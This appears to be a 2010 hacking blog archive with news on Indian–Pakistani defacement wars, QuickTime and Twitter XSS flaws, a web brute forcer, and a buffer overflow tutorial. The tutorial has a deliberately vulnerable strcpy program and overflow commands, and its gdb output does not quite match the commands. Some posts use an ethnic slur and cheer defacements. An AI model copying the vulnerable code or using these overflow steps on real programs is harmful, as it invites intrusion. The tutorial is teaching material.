Monday, September 27, 2010

Free Recharge Any Mobile Hack – Applicable on All networks :)

Yep..I perfectly know why you are here..You wish to recharge your phone for free, probably just for fun's sake or just cuz you are dying to talk with your girlfriend but don't have balance for it..or you are just here to do it for educational purposes, which is a pretty lame excuse but I can digest that. Anyways..here we go..

What you need ?

  • Email ID
  • Cellphone
  • A registered number & sim
  • Patience


How to Do it ?

Open your email account by entering your username & password, & drop an email to your telecom service provider -

Dear Sir/Madam/Whatever

I would like to bring to your attention that I have been trying to learn how to recharge my cellphone account for free by searching on the internet but in vain. I am very hopeful that I would be able to find an authentic way to top up my account for free one day.

I have this funny feeling that your organization is a silly company who will allow me do unlimited top ups on my account.

Anyhow, I am a good guy and would resort to extreme ways, rather I humbly request you to provide me the recharge code of at least 5000 INR.

Thanks for your cooperation.

Regards

Your biggest Fan :)

9XXXXXXXXX

That was easy…isn't it ?

 Just Kidding folks..I was having some harmless fun at your expense.

How actually you can Recharge your cellphone / top up for free ?

Open Notepad & type

I am fooling around with this article thats making a fool of me :)

WTF ?

Still reading ? Ah well..Sorry once again guys..Actually, what I was thinking was that up to this point, any self respecting noob might have closed the browser window and moved on to a different page.

I wrote this article as I was inspired by the fake recharge/top up code calculator programs scattered all over the internet. Especially this one in which a hex editor is provided to the unassuming audience in order to increase blog SEO.

Great..now on to the actual topic, you CAN have free calls, unlimited SMS & every other facility for your cellphone. You need to have (Cheap method) -

  • Asterisk SwitchVOX
  • SIP connection (Session Initiation Protocol)
  • Knowledge of Linux + Servers
  • Lots of time

OR

You can have

  • Lots of Money
  • MINSAT (Mobile Intelligent Network Service Administration Tool)
  • Internet connection
  • Lots of knowledge + time (again!!)

Due to some constant bullying by legal guys, I can't really publish the full method to go with recharges, but at least I can give cues :D

The Intelligent will find the way..

 

Posted by XERO. ALL RIGHTS RESERVED.

Friday, September 24, 2010

CYBER GHOST: We are live once again to provide you best cyber & hacking news


Hi Friends.. Amarjit Singh here and hope you all will be happy to see me once again. Well you will not find any old post here.. why no need to tell.

Do not ask me what happened and where I was....because I am only thinking about our new venture these days. As most of you guys are aware, Cyber Terrors will be launched on 30th Oct, in which I am working as co-author.....along with this we are also planning to launch a new Magazine..which will be the first of its type. The magazine name is CYBER GHOST and it will be published on a monthly basis. The target is all you guys and I am damn sure that I will get a huge response from all you guys. This magazine will be launched on 7th OCT....and the venue for its launching party is CHANDIGARH, PUNJAB...Yes it's my motherland Punjab.

So..I am closing here for today..keep your eyes open for tomorrow and keep visiting this blog. If you have any query, just drop me a comment here


Remarkable Revenge against BURN QURAN DAY


Cyber war between Porki and patriotic hackers


SOURCE: Cyber Terror

The hacking rivalry between Pakistani and Indian hackers is known to almost everyone. Pakistani hackers are known to be the most unethical hackers, and our Indian hackers call them porkis.

This cyber war is never going to stop, and it has spread to several countries across the globe. In the age of technology wars, battles are fought not with weapons or atomic power but through information technology, and the pace of cyber wars between Pakistan and India has increased as well. Information is a source of learning, but unless it is organized, processed, and available to the right people in a format for decision making, it is a burden, not a benefit.

Cyberwars between the two countries first started in May 1998, when India conducted its nuclear tests. Soon after India officially announced the test, a group of UK-based hackers called milw0rm broke into the Bhabha Atomic Research Center web site and posted anti-India and anti-nuclear messages.

Recently a cyber war seems to have started between Pakistani and Indian hackers. It all started when the IGCOE hacker from India hacked the official website of the Punjabi Pakistani Police. In response, Pakistani hackers hacked several of India's official websites. Whenever an Indian hacker hacks a Pakistani website, they leave the message “You Porki You is hacked” on it. The word Porki comes from pork: Muslims hate pork and treat this term as slang. Maybe that's the reason Indian hackers have preferred using this word for Pakistani hackers.

As per the Indian constitution, hacking is a crime, be it ethical or unethical. The irony is that other nations are using these hackers to sabotage neighboring countries as well as to protect their own cyber world. If Indian hackers were given a chance and taken into confidence, they could create wonders by protecting the entire cyber network of India, because India has the most efficient hackers on the globe. One would definitely like to know who wins the battle, Pakistani hackers or Indian hackers; the answer is none. There is nothing to win, only loss. Both Pakistani and Indian websites got hacked, which means that both countries suffered security threats. This battle may result in losses for innocent people who are not part of the war.

The most widely used method is SQL injection. SQL injection involves entering SQL code into web forms, e.g. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application. The other methods used are brute force or dictionary attacks. The hackers might have cracked an FTP password to gain access to the server. Earlier, Pakistani hackers used to be called Pakbugs and Indian hackers were named HMG.

There are some so-called ethical hackers overrated by the media and hyped beyond their actual caliber, but some hackers do not even know who this Ankit Fadia is. There are a lot of arguments and facts against him; some people say he is not a HACKER, he is just a businessman.

At the age of 14 Ankit Fadia started a website called “HackingTruths”, which he claims was judged as the “second best hacking site in the world by the FBI”. The question is, when did the FBI start rating hacking sites? And if the FBI does so, why should it overlook other such sites and blogs which have much more potential than Fadia’s claims? The FBI is an investigation agency and has got nothing to do with the ranking of any such website. Fadia’s claims seem to have flopped because he has never created any tools for hacking. Most intelligence agencies like the NSA have expert cryptanalysts with PhDs and super-fast clusters to get their job done, so why would they require this mature guy to do such a serious job? The so-called great hacker's website was itself hacked: in December 2009 Fadia’s business site, hackingmobilephones.com, was hacked by a spammer promoting pharmaceutical products for erectile dysfunction. The question remains why this so-called “INDIA’S BEST HACKER” couldn’t protect his site from other hackers. If given a chance and assurance, capable hackers of this country can do much, much more than Fadia. It's high time the Government took the help of these hackers to protect our own cyber network and used them as a cyber army.

The recent Independence Day was a nightmare for some of the webmasters and website owners of both India and Pakistan. The attack was started by Pakistani hackers defacing some Indian websites on 14th August; this was followed by a counter attack from Indian hackers. In the attacks from both sides, a lot of websites were hacked and defaced. The attack was started by Pakistani groups called Pak Cyber Army and PakHaxors; these groups defaced around 10-20 websites. The counter attack was led by Indian hackers called Indishell and Indian Cyber Army, who claim to have defaced more than 2000 Pakistani websites, but Zone-h data confirms the 1000+ figure.

Indian hackers always thought they were too sophisticated to fall into the hands of the rough cops in this country, whom various human rights groups routinely accuse of brutality. Why should the government and police be so merciless with the hackers? They want to be on the official side of Internet security now, but they are scared, because being treated as criminals leaves an unpleasant taste. Indian hackers don’t have a strong united community, so it’s difficult to tell if there is a drop in activity; maybe that’s the reason the hackers are lying low. Nobody wants to mess again.


Tuesday, September 21, 2010

Devil May Cry 5 Trailer Impressions

WTF ? DMC5 ? at TGS 2010 ? Released on 15 September, I got hold of the DMC 5 trailer, or you can say DmC trailer. For those who don't know what Devil May Cry is, go to the corner & wear the dunce cap ! Devil May Cry is the hack & slash action game series by Capcom featuring one of the most intricate fighting systems & the coolest protagonist, Dante; it's the game against which other hack & slash games are measured!! The new DmC is said to be a reboot of the series. REBOOT ?!! Ah well.. I will come to the point later, let's first have a look at the trailer.

DmC / Devil May Cry 5 Trailer TGS 2010

Man..what were they thinking ? Where the hell is all badass Dante ? The silver haired demon slayer has been dumped for this skinny juvenile ? & a Reboot ? What happened to Nero ? What about the legend of Sparda ? Man..even Hideki Kamiya, the creator of DmC commented Dante ?!!! Ah gross !!!
“I miss him, too…” and later added “I’ve been sad since Dante left me.”
In a later tweet when a fan asked the question:
“DmC by Ninja Theory? Do you think they will evolve the action game from your Bayonetta standard?”,
Kamiya-san simply said:
    “whatever”
See ? Dear folks at Ninja Theory..the game better be badass, else this new Dante might prove your last stand.
Well..looking at the trailer, some things pass my mind -
  • New Dante looks like ass!
  • It might not be a reboot at all (.0001% chance) & this might be the story of an abandoned Dante struggling with his goddamn teenage, & later at the end of game, the prologue of Devil May Cry 3 begins.
  • The visuals are improved, especially the blur & sonic effects.
  • The new weapon is ass! Except the Sword..I don't like the Daggertail like thing Dante holds..The Dante I knew liked to take things Up close & PERSONAL !
We miss you Dante..
Posted by XERO. ALL RIGHTS RESERVED.

Tuesday, September 14, 2010

Marshald Punk pwns Quicktime & Windows – 9 Years Old Flaw

Great…just came to know from “El Reg” how an obsolete parameter in a program separate from the OS can wreak havoc. Worse, it was a development flaw which has been lurking undetected for the last 9 years. A Spanish security researcher, Ruben Santamarta, recently unearthed a backdoor in Apple QuickTime player that can be used to remotely execute arbitrary code on Windows-based systems. The backdoor “_Marshaled_pUnk” is bizarre in nature, as it is the work of an Apple developer who added it to the QuickTime code base and then, most likely, forgot to remove it when it was no longer needed. Adding salt to the wound, this can be exploited to take FULL control of even the latest Windows OS, Windows 7. As told by H D Moore, CSO of Rapid7 and chief architect of the Metasploit project, to “El Reg” on Monday -

“The bug is pretty bizarre. It's not a standard vulnerability in the sense that a feature was implemented poorly. It was more kind of a leftover development piece that was left in production. It's probably an oversight.”

How the punk pwned ?

Schemes like DEP, or data execution prevention, prevent data in memory from being executed as code, & ASLR, or address space layout randomization, loads code into locations that an attacker can't predict, thereby hardening the Windows architecture to some extent. “_Marshaled_pUnk”, however, creates an object pointer equivalent that an attacker can use to load malicious code into computer memory. In a witty maneuver, Santamarta used a technique called return oriented programming, also known as ROP, to load code by loading WindowsLiveLogin.dll into memory & reordered the commands in a way that allowed him to gain control of the testbed. Using the Microsoft DLL not only allowed him to know where in memory it would load, it also allowed him to get the code executed.

What next ?

Santamarta confirmed the exploit on the XP, Vista, and 7 versions of Windows. He also said that the parameter existed in QuickTime versions dating back to 2001, when it could be used to draw contents into an existing window instead of creating a new one. The functionality was eventually removed from newer versions but the line lived on. Combined with an unrandomized DLL like the one for Windows Live, it represents a serious threat to end users. The flaw has demonstrated that the threat comes from programs that fail to use ASLR & DEP protections. Surprisingly, as reviewed by Secunia, a large number of popular applications — including Quicktime, Foxit Reader, Google Picasa, OpenOffice.org, RealPlayer, and VLC Player — neglect to use one or the other.
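
To check whether a given EXE or DLL opts in to ASLR and DEP, read the DllCharacteristics field of its PE header. The following is an added example, not code from the post or from any of the parties it quotes; the function names are hypothetical and the sample header is constructed for the demo.

```c
/* Added example: report whether a Windows PE image opts in to ASLR and DEP.
   Function names and the sample header are constructed for this illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DLLCHAR_DYNAMIC_BASE 0x0040 /* IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: ASLR opt-in */
#define DLLCHAR_NX_COMPAT    0x0100 /* IMAGE_DLLCHARACTERISTICS_NX_COMPAT: DEP opt-in */

enum { PE_OK = 0, PE_TRUNCATED = -1, PE_NOT_PE = -2 };

/* Little-endian readers/writer so the parser works on any host. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v & 0xff); p[1] = (uint8_t)(v >> 8); }

/* Parse the headers of a PE image held in memory and report its opt-in flags. */
int pe_mitigations(const uint8_t *img, size_t len, int *aslr, int *dep)
{
    if (len < 0x40)
        return PE_TRUNCATED;                  /* no room for the DOS header */
    if (img[0] != 'M' || img[1] != 'Z')
        return PE_NOT_PE;

    uint32_t pe = rd32(img + 0x3C);           /* e_lfanew: offset of "PE\0\0" */
    /* Need signature (4) + COFF header (20) + optional header up to
       and including DllCharacteristics (72 bytes). */
    if (pe > len || len - pe < 4 + 20 + 72)
        return PE_TRUNCATED;
    if (memcmp(img + pe, "PE\0\0", 4) != 0)
        return PE_NOT_PE;
    if (rd16(img + pe + 4 + 16) < 72)         /* SizeOfOptionalHeader too small */
        return PE_TRUNCATED;

    const uint8_t *opt = img + pe + 24;
    uint16_t magic = rd16(opt);
    if (magic != 0x10b && magic != 0x20b)     /* PE32 or PE32+ */
        return PE_NOT_PE;

    uint16_t flags = rd16(opt + 70);          /* DllCharacteristics: offset 70 in both */
    *aslr = (flags & DLLCHAR_DYNAMIC_BASE) != 0;
    *dep  = (flags & DLLCHAR_NX_COMPAT) != 0;
    return PE_OK;
}

/* Build a minimal constructed PE32 header (not a loadable image) for the demo. */
size_t make_sample_pe(uint8_t *buf, size_t cap, uint16_t dll_characteristics)
{
    const uint32_t pe = 0x80;
    const size_t total = pe + 24 + 96;        /* headers plus a 96-byte optional header */
    if (cap < total)
        return 0;
    memset(buf, 0, total);
    buf[0] = 'M'; buf[1] = 'Z';
    wr16(buf + 0x3C, (uint16_t)pe);           /* upper two bytes are already zero */
    memcpy(buf + pe, "PE\0\0", 4);
    wr16(buf + pe + 4, 0x014c);               /* Machine: i386 */
    wr16(buf + pe + 4 + 16, 96);              /* SizeOfOptionalHeader */
    wr16(buf + pe + 24, 0x10b);               /* PE32 magic */
    wr16(buf + pe + 24 + 70, dll_characteristics);
    return total;
}

int main(int argc, char **argv)
{
    static uint8_t buf[4096];
    size_t n;
    int aslr = 0, dep = 0;

    if (argc > 1) {                           /* check a real file's headers */
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        n = fread(buf, 1, sizeof buf, f);
        fclose(f);
    } else {                                  /* constructed sample: DEP only */
        n = make_sample_pe(buf, sizeof buf, DLLCHAR_NX_COMPAT);
    }
    int rc = pe_mitigations(buf, n, &aslr, &dep);
    if (rc != PE_OK) {
        fprintf(stderr, "not a usable PE image (%d)\n", rc);
        return 1;
    }
    printf("ASLR opt-in: %s, DEP opt-in: %s\n", aslr ? "yes" : "no", dep ? "yes" : "no");
    return 0;
}
```

An image that reports "no" for ASLR loads at its preferred base address, which is the property of the Windows Live DLL that the exploit described above relied on.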

Till then..wait for Apple to release a patch for the 9 year old Punk.

 

Posted by XERO. ALL RIGHTS RESERVED.

Cyber Terrors Coming Soon: Unite Indian Hackers

Is it true that only Certified can join the campaign??? What is the requirement to join this?

This campaign is against Cyber Terrorism for people who are anti Indian. There is no legal certification or formal qualification to join this cause. So whether you are a Black Hat, White Hat or Grey Hat, it doesn’t really matter. We want to unite all the hackers in India under one roof for their benefit, and put their skills to use in a right and approved manner.

Monday, September 13, 2010

Packet-O-Matic – An Open Source Realtime Packet Processor

Packet-o-matic is a modular real time packet processor under the GPL license. It reads the packet from an input module, matches the packet using rules and connection tracking information and then sends it to a target module. The modular nature of packet-o-matic allows it to work for any protocol as long as its corresponding module is found. The built-in management console allows you to telnet into packet-o-matic and change the configuration in real time. Main features of Packet-o-matic are :

  • connection tracking currently for ipv4, ipv6, tcp, udp, rtp
  • ip reassembly, tcp reordering
  • match the complete protocols encapsulation i.e. "ethernet->ipv6->ipv4->udp->rtp"
  • process all the packets in real time to provide the desired output

What it can do ?

  • save all the VoIP calls going on an interface in separate files in real time
  • reinject packets destined to a specific ip and port on another interface or save them in a file
  • dump each file of all the http connections in separate files on the disk
  • show the important info and a hexadecimal dump of each packet while doing the above three at the same time
  • lots of other stuff which would be too long to list here

Operating System Supported : Linux

Posted by XERO. ALL RIGHTS RESERVED.

Saturday, September 11, 2010

ObiWaN – Server Bruteforcer by Phenoelit

ObiWaN is the brainchild of Phenoelit, a German hacker group headed by elite hacker FX, and is written to carry out brute force security testing on webservers. The goal of ObiWaN is a brute force authentication attack against a webserver with authentication requests - and in fact to break in insecure accounts. As the official documentation says -

ObiWan is written to check Webserver. The idea behind this is: Webserver with simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. In fact this is the point to start from. Every user with a HTTP connection to a host with basic authentication can try username-password combinations as long as he/she like it.
Like other programs for UNIX system passwords (crack) or NT passwords (l0phtcrack) ObiWaN uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords. Since Webservers allow unlimited requests it is a question of time and bandwidth to break in a server system.


ObiWaN exploits a weakness in the HTTP protocol, which, as explained by Phenoelit itself, is that nearly all servers allow unlimited username/password tries for a user, & it literally becomes a question of time and bandwidth to break in a server. After you break in, you are the alpha & the omega of server..
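
The "intruder lockout or delay timings" that the documentation says are missing can be sketched as a small failure tracker that sits in front of the password check. This is an added example, not code from ObiWaN or from any web server; every name, limit and address in it is an assumption chosen for illustration.

```c
/* Added example: failure tracking with temporary lockout for an HTTP Basic
   authentication handler. All names and limits are illustrative. */
#include <stdio.h>
#include <string.h>

#define MAX_KEYS      64    /* tracked client/user pairs */
#define KEY_LEN       64
#define MAX_FAILURES  5     /* failures tolerated inside WINDOW_SECS */
#define WINDOW_SECS   300
#define LOCKOUT_SECS  900

struct auth_entry {
    char key[KEY_LEN];      /* e.g. "192.0.2.10|admin" */
    int  failures;
    long window_start;      /* time of the first failure in the current window */
    long locked_until;      /* requests are refused while now < locked_until */
};

struct auth_tracker {
    struct auth_entry entries[MAX_KEYS];
    size_t used;
};

static struct auth_entry *lookup(struct auth_tracker *t, const char *key,
                                 long now, int create)
{
    char k[KEY_LEN];
    struct auth_entry *spare = NULL;

    snprintf(k, sizeof k, "%s", key);   /* compare on the stored (truncated) form */
    for (size_t i = 0; i < t->used; i++) {
        struct auth_entry *e = &t->entries[i];
        if (strcmp(e->key, k) == 0)
            return e;
        /* an entry that is neither locked nor inside its window may be reused */
        if (now >= e->locked_until && now - e->window_start > WINDOW_SECS)
            spare = e;
    }
    if (!create)
        return NULL;
    if (t->used < MAX_KEYS)
        spare = &t->entries[t->used++];
    if (spare == NULL)
        return NULL;                    /* table full of active entries: size it generously */
    memset(spare, 0, sizeof *spare);
    snprintf(spare->key, sizeof spare->key, "%s", k);
    return spare;
}

/* Call before verifying the password; 0 means refuse without checking it. */
int auth_allowed(struct auth_tracker *t, const char *key, long now)
{
    struct auth_entry *e = lookup(t, key, now, 0);
    return e == NULL || now >= e->locked_until;
}

/* Call after the password check with its outcome. */
void auth_record(struct auth_tracker *t, const char *key, int success, long now)
{
    struct auth_entry *e = lookup(t, key, now, !success);
    if (e == NULL)
        return;
    if (success) {
        e->failures = 0;                /* a good login clears the count */
        return;
    }
    if (e->failures == 0 || now - e->window_start > WINDOW_SECS) {
        e->failures = 0;                /* start a fresh counting window */
        e->window_start = now;
    }
    if (++e->failures >= MAX_FAILURES) {
        e->locked_until = now + LOCKOUT_SECS;
        e->failures = 0;
    }
}

/* Simulate one client sending wrong passwords, one every `interval` seconds.
   Returns how many guesses actually reached the password check. */
int simulate_guessing(int guesses, long interval)
{
    struct auth_tracker t;
    const char *key = "192.0.2.10|admin";   /* constructed client address and user */
    int checked = 0;

    memset(&t, 0, sizeof t);
    for (int i = 0; i < guesses; i++) {
        long now = (long)i * interval;
        if (!auth_allowed(&t, key, now))
            continue;                       /* refused: no password comparison */
        checked++;
        auth_record(&t, key, 0, now);
    }
    return checked;
}

int main(void)
{
    printf("1000 guesses at 1/s: %d reached the password check\n",
           simulate_guessing(1000, 1));
    return 0;
}
```

Keying on client address plus username keeps one guessing client from locking the real user out from elsewhere; a client that stays under the threshold (one guess every 100 seconds here) is slowed but never locked, so failed logins still need to be logged and reviewed.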

enjoy :)

Posted by XERO. ALL RIGHTS RESERVED.

Thursday, September 9, 2010

Let's Build a Responsible Cyber Society

WHO HACKED VIJAY MALLYA? Mystery unsolved...


On Aug 15, 2010, hackers took over the website of high profile Indian businessman, politician and IPL team owner, Vijay Mallya. The hackers posted pro Pakistani messages and signed off as Pakistan Cyber Army (PCA). At least 6 national Indian media interviewed Vijay Mallya about his site being hacked. PCA has released a statement to news media explaining what really happened.

On Aug 16, Techgoss (TG) had published an article speculating whether the long standing cyber cease fire between organized Indian and Pakistani hacker groups had broken down and if we were witnessing an organized hacking war again.

On Aug 20, my Techgoss colleague Shalini Singh had published an article about Vijay Mallya tweeting that his computing team had ‘un-hacked’ his website. Business tycoon Vijay also tweeted that they had traced the hacker to Lahore. This article had also speculated if the attack on Vijay Mallya had actually been done by an individual rather than a hacker group.

On Aug 24, 2010, the Pakistan Cyber Army released the following statement. In this statement, the Pakistan Cyber Army makes it clear that they were not behind the hacking of Mallya’s website. The Pakistan Cyber Army also makes it clear that they are working with Indian techie Gaurav to work out practical ways to stop the hacking of sites in each other’s countries.

“We are Pakistan Cyber Army - the hackers of famous ONGC India and many other websites in November 2008. The recent defacement of "Vijay Mallya" website is being associated with us. We are sending our statement regarding this particular incident. "Pakistan Cyber army is not involved in any of the recent defacements done by any hacker. We are happy that the concept of “Pakistan Cyber Army” has become so popular that many in Pakistan are using our name. Different hacking groups in countries like Iran, Afghanistan, and India have adapted the same naming convention for their names.

Please do not associate "Pakistan Cyber Army which has only three members HAroon aka D45H, Hamza aka R4yd3n and Abunasar aka Abunasar” with any other hacking groups from Pakistan. There are a bunch of guys who are operating by using our name in websites and forums.
Pakistan Cyber Army is only for retaliation but only in the most severe cases of attacks on our sites. We do not have any website, blog, forum, email, Facebook group and Orkut community. None of you out there can contact us or find us unless we find and contact you by ourselves.

We have no association or contact with ISI or any agency of Pakistan nor are we supported by Pakistan Government. Pakistan has to deal with many great challenges. The current defacements which are going on can’t be called as cyber war. By defacing random websites is just like wall chalking. The idea of "Pakistan Cyber Army" was totally genuine and as mentioned in our previous messages comes with in 5 minutes. Our attack in November 2008 wasn’t similar to these defacements which are occurring these days/months. We attacked the chain of schools of Indian Army "Kendriya Vidyalaya website kvrtm.org.in" Because ICW/HMG hacked one of our School chain.

We hacked "Indian Institute of Remote Sensing website iirs.gov.in" Because ICW/HMG hacked one of our Girl Colleges in Gojra. We hacked "Syscontech website syscontech.in" because ICW/HMG hacked one of our software houses. We hacked "Indian Railway Website indianrail.gov.in" because ICW/HMG hacked one of our transportation website. The website of Oil and Natural Gas Cooperation limited website was hacked "ongc.com" because ICW/HMG hacked into our Oil & Gas Regulatory Authority. People & media thought that we hacked only ONGC as a planned target and others as random. That was not the case. We defaced each and every thing in same industry and same stature and all of our defacements were targeted. But still you can’t call our defacements as cyber war. Cyber war is a bigger term which means attacking on our IT infrastructure and make it impossible to recover. Pakistan Cyber Army Alhamdolillah has the capability to go far more than the website defacement if we are to retaliate and we have no such intention to attack. Pakistan Cyber Army is for peace.

We PCA have really no time to be involved in wall chalking/defacing websites. We have many better things to do in Life. We are sleeping but not dead. If anyone, not only India, tries to damage our IT, Telecom and Defense infrastructure we have a right to again retaliate and give them the best of possible answers. People at HMG/ICW respect us and we respect them too. Our peace deal with ICW/HMG still exists. I would like to mention Gaurav aka r45c4lh4ck3r from HMG. He is really a nice guy who made this deal possible. In the end we would like to clarify that we were not involved in the useless defacement of "Vijay Mallya" website. But it can be considered as answer from “Pakistan Cyber Army (new one)” because on 14th of August 2010 “Indian Cyber Army” defaced some 1200 Websites. We are in contact with "Indian Cyber Army & Pakistan Cyber Army (new one)" and we are trying to make a peace deal between those two groups as well.

Defacing website is a crime but to take it as threat to national security is similar to taking a knife as an atom bomb. Our message to the young people is to concentrate on their studies and comes with something good for both of the countries. Do polish your skills if you want to be a hacker or are a hacker. There is a thin line between hacker and criminal. The person who steals email, bank accounts, credit cards etc should be called as criminal not a hacker. So guys study well and make your parents happy. If you get arrested for doing website defacement, the first ones who will be disappointed and shocked will be your parents.

We are for Peace “We are sleeping but Not Dead” Pakistan Cyber Army
HAroon aka D45h, Hamza aka R4yd3n and Abunasar aka Abunasar"

Terrorism is a curse for the society that we live in. Our lives have changed irrevocably today because of the terrorism threats which surround all of us. We don’t know if there could be a terrorist attack in the plane we plan to catch or on the train we commute or even in the mall which we regularly shop or the hotel where we stay. While the physical world struggles to cope with the problems of terrorism, the cyber world has its own concerns on “Cyber Terrorism”. ITA 2008 has defined an offence under Section 66F called “Cyber Terrorism”. This issue tries to explore the legal aspects of this clause particularly how it may impact a corporate entity.

5 more sites for Security Basics

Last time I blogged about 5 sites for Budding Hackers & followed up with 5 more sites for budding hackers... but as the user queries flood my inbox for more, I decided to dig a bit more & publish some of the more prominent sites I visit in my free time. The following blogs are prominent & hot favorites for security essentials & are full of resources which will enhance your skill set. A must visit list -

Securitytube
watch-learn-contribute..A site packed with lots of security related videos,resources & up to date news.

Offensive Security
Need I say more ? The creators of the renowned security distro Backtrack maintain one of the best happening forums on security. The link above relates to backtrack tutorials & forums, explore & learn..as always, the quieter you become, the better you are able to hear.

SmashTheStack
Like Wargames ? Smash the stack is your portal for the ultimate wargames which will escalate your level from nothing to something..pay attention,play well & learn.

PaulDotCom
One of my favorite security podcasts, the website provides insightful papers, presentations & discussions on hot security topics.

Tuts 4 You
Reverse engineering anyone ? Tuts4You is a community for researchers and reverse engineers interested in the field of Reverse Code Engineering (RCE). Great tuts..Great resources..

Posted by XERO. ALL RIGHTS RESERVED.

Hackers create 57,000 fake web addresses weekly

According to a three month long study carried out by PandaLabs – the research arm of Panda Security – each week, hackers are creating 57,000 new fake web addresses to trick or infect users.

Panda says that in an average week, hackers use some 375 different high-profile names and company brands to lure users.

Interestingly, Panda claims that 65% of fake websites imitate bank pages, followed by online stores and auction pages at 27%.

For its research, PandaLabs says it analysed malicious URLs positioned on the internet that hackers use to trick users into downloading malware or directly steal their bank details.

As well as banks, fake online stores such as eBay are used by hackers to steal users' login credentials.

Other financial institutions, such as investment funds, stockbrokers, and government organisations, occupy the following positions, with 2.3% and 1.9% respectively. The latter government organisations are, says Panda, largely accounted for by the US revenue service or other tax collecting agencies.

Payment platforms, led by Paypal, and ISPs are in fifth and sixth place, whilst gaming sites – topped by World of Warcraft – complete the rankings.

Luis Corrons, PandaLabs' technical director, said that the problem is that, when users visit a website through search engines, it can be difficult for users to know whether it is genuine or not. "For this reason, and given the proliferation of this technique, it is advisable to go to banking sites or online stores by typing in the address in the browser, rather than using search engines", he said.


Wednesday, September 8, 2010

Hackers Exploit Twitter XSS Flaw



A dangerous XSS bug surfaced on Twitter on Monday, and researchers have seen active exploits for the bug, which allows an attacker to steal the session cookie of a Twitter user with a simple click-and-you're-owned technique.

Experts say that the attacks seem to be emanating from domains in Brazil, and that more than 100,000 users had already clicked on one malicious shortened URL related to the attack. And that's just one link. It's unclear how many other malicious links have been created to exploit this flaw.

"The malicious JavaScript payload that's being distributed is rather simple. It uses an XSS (Cross-Site Scripting) vulnerability to steal the cookie of the Twitter user, which is transferred to two specific servers. Essentially, any account which clicked on the malicious links is compromised," Stefan Tanase, an anti-malware researcher who specializes in social networking threats at Kaspersky Lab, said in an analysis of the Twitter exploit.

"All clues point to Brazil as the originating country for this attack. First, the 2 domain names used to get the stolen cookies are registered under Brazilian names. More than that, one of them is actually also hosted in Brazil."

One of the tweets used to direct users to the malicious site exploiting the XSS bug is written in Brazilian Portuguese and references a Brazilian band.

Twitter officials said on Tuesday morning that the vulnerability has been fixed. However, the XSS flaw, which was on one of the many sub-domains that Twitter maintains, may just be the tip of the iceberg for the massively popular social networking platform. The shortened URLs that are essentially mandatory on Twitter, thanks to the platform's 140-character limit on messages, are a serious weak link in the site's security.


Euro-Islam was Hacked: Back to Normal Operations


As per Euro-Islam member "Recently, Euro-Islam was hacked as a result of malicious hackers targeting Mediatemple’s (Our host) customers. Unfortunately, clean up took longer than expected. However, you can rest assured that we have taken several steps to prevent this issue from occurring again. Our researchers have continued to compile news during the site’s blackout and all information is now posted online. We are resuming a normal schedule; you can expect to see new news added every week."

You can rest assured no personal information on users was gathered.

Tuesday, September 7, 2010

Buffer Overflow Attack tutorial by example

A Buffer Overflow is a flaw in which a program writes more data into a memory buffer than it can hold, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates, for example <inputting a very large value in a C program which does integer based addition>. A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why am I writing this ? Well..I found an excellent article on buffer overflow by eXeCuTeR <executerx[at]gmail[dot]com> & thought you might wanna have a look at it. It's explained in quite easy language with a very basic example.
read & learn..

Our vuln program:
---------- bof.c --------------
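#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char str[10];           /* 10-byte buffer on the stack */
    strcpy(str, argv[1]);   /* no length check: anything past 10 bytes is written beyond str */
    printf("Done");

    return 0;
}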
---------- bof.c --------------
As you can see, argv[1] is copied to str (str can hold 10 characters).
Try to think - what happens when we load more than 10 bytes into str? You'll see.

Let's try compiling the program and loading 12 bytes:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`
Doneniv@niv-desktop:~/Desktop$

The program ran and exited normally even though we loaded 12 bytes, which means 12 bytes aren't enough to crash the program.


Let's try to overflow the program with 14 bytes:

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`
Doneniv@niv-desktop:~/Desktop$

Failed. Again.

Let's load 32 bytes this time:
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$
In case it says *** stack smashing detected *** (or something similar), the compiler's stack protector has caught the overflow and aborted the program. To follow along, go to the terminal, type sudo apt-get install gcc-3.3, and compile with gcc-3.3 example.c -o example instead of gcc example.c -o example.

We made it, we overflowed the program.

Now we'll check further what exactly happened:

niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141       0x41414141


We overwrote the EIP with A's (A = 41 in hex). The EIP is the Instruction Pointer; it points at the next instruction to execute.
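The defensive counterpart to bof.c, as an added example that is not part of the original tutorial: the same 10-byte buffer, but the copy is refused when the argument does not fit, so the 12-, 14- and 32-byte inputs used above never get written past str. The names safe_copy and bof_main are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define STR_SIZE 10   /* same size as str[] in bof.c */

/* Copy src into dst only when it fits, terminating NUL included.
 * Returns 0 on success, -1 when the input is rejected. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
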